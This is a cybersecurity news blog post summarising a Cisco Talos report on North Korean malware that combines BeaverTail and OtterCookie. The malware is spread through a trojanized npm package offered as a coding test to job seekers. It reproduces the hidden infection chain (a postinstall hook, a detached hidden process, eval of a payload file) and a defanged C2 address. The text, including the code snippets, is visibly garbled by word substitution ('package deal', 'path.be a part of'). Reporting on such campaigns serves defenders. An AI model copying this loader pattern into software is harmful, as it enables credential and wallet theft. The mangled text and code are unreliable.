Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging

North Korean Hackers Using Malicious Scripts Combining BeaverTail and OtterCookie for Keylogging

Posted on October 16, 2025October 16, 2025 By CWS

A brand new information-stealer has emerged focusing on job seekers with a trojanized Node.js software named Chessfi.

Delivered through a modified npm package deal hosted on the official repository, the malware blends two beforehand separate instruments—BeaverTail and OtterCookie—right into a unified JavaScript payload.

Victims are lured by way of faux employment provides and requested to put in the appliance beneath the guise of a coding evaluation, unknowingly triggering malicious scripts that harvest credentials, cryptocurrency wallets and person exercise.

Cisco Talos analysts recognized the marketing campaign when investigating uncommon outbound visitors from a compromised system.

They discovered {that a} submit‐set up script within the node-nvm-ssh package deal spawns a hidden little one course of that deobfuscates and evaluates a big JavaScript payload.

Node-nvm-ssh an infection path (Supply – Cisco Talos)

This payload merges BeaverTail’s browser extension enumeration and InvisibleFerret Python downloader with OtterCookie’s distant shell, file exfiltration, clipboard and now keylogging modules.

As soon as executed, the mixed malware establishes a connection to a command-and-control server over socket.io.

The attacker can remotely situation instructions, steal recordsdata matching a variety of patterns—from .env and .docx to cryptocurrency extension directories—and execute shell instructions.

In the meantime, the keylogging element captures each keystroke and takes periodic desktop screenshots earlier than importing them to the C2 server together with clipboard contents.

Sustained community exercise

Contaminated methods present sustained community exercise on high-numbered TCP ports, typically 1418 for socket.io and 1478 for keylog uploads.

The malware creates a short lived folder named windows-cache and writes keystrokes to 1.tmp each second, whereas screenshots are saved as 2.jpeg each 4 seconds.

Utilizing the Node.js packages node-global-key-listener, screenshot-desktop and sharp, the module configures listeners for key occasions and schedules screenshot captures, then bundles and sends the information to hxxp://172.86.88.188:1478/add.

The keylogger listens for the keyboard and mouse key presses and saves them right into a file (Supply – Cisco Talos)

Along with credential theft and distant shell entry, the marketing campaign’s an infection mechanism employs a multi-stage chain to evade detection. After cloning the repository, a malicious postinstall script in package deal.json executes the skip script:

“scripts”: {
“postinstall”: “npm run take a look at npm run transpile npm run skip”
}

The skip command invokes node testfixtures/eval, which by default hundreds index.js. That script spawns a indifferent little one course of working file15.js:

const filePath = path.be a part of(__dirname, ‘node_modules’, ‘file15.js’);
const little one = spawn(course of.execPath, [filePath], { indifferent: true, stdio: ‘ignore’ });

Lastly, file15.js reads and evaluates the content material of take a look at.listing utilizing eval, revealing the mixed BeaverTail and OtterCookie modules:

const fs = require(‘fs’);
const path = require(‘path’);
const filePath = path.be a part of(__dirname, ‘take a look at.listing’);
fs.readFile(filePath, ‘utf8’, (err, information) => { eval(information); });

This convoluted chain—cloning a Git repository, working benign-looking npm scripts, spawning hidden processes and dynamically evaluating an obfuscated payload—underscores the delicate an infection mechanism.

By merging BeaverTail’s stealthy Python payload downloader and OtterCookie’s modular information-stealer, Well-known Chollima has crafted a flexible malware that leverages acquainted developer workflows to compromise unsuspecting victims.

Comply with us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:BeaverTail, Combining, Hackers, Keylogging, Korean, Malicious, North, OtterCookie, Scripts

Post navigation

Previous Post: North Korean Hackers Use EtherHiding to Hide Malware Inside Blockchain Smart Contracts
Next Post: Cisco IOS and IOS XE Software Vulnerabilities Let Attackers Execute Remote Code

Related Posts

Graphite Spyware Exploits Apple iOS Zero-Click Vulnerability to Attack Journalists Graphite Spyware Exploits Apple iOS Zero-Click Vulnerability to Attack Journalists Cyber Security News
Critical FreeBSD Flaw Risks System Security Breach Critical FreeBSD Flaw Risks System Security Breach Cyber Security News
10 Best Malware Analysis Tools 10 Best Malware Analysis Tools Cyber Security News
North Korean Hackers Trick Users With Weaponized Zoom Apps to Execute System-Takeover Commands North Korean Hackers Trick Users With Weaponized Zoom Apps to Execute System-Takeover Commands Cyber Security News
Apple Hints That iPhone 17 Is to Eliminate the Physical SIM Card Apple Hints That iPhone 17 Is to Eliminate the Physical SIM Card Cyber Security News
Microsoft OAuth Device Phishing Threat Escalates Microsoft OAuth Device Phishing Threat Escalates Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Mythos Excels in Vulnerability Detection, Faces Varied Challenges
  • OpenAI Faces Lawsuit Over ChatGPT Data Sharing Practices
  • Revolutionizing Data Center Security with DPUs
  • Ghostwriter Intensifies Phishing Attacks on Ukraine
  • AI Enhances Security with Realistic Attack Simulations

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Mythos Excels in Vulnerability Detection, Faces Varied Challenges
  • OpenAI Faces Lawsuit Over ChatGPT Data Sharing Practices
  • Revolutionizing Data Center Security with DPUs
  • Ghostwriter Intensifies Phishing Attacks on Ukraine
  • AI Enhances Security with Realistic Attack Simulations

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark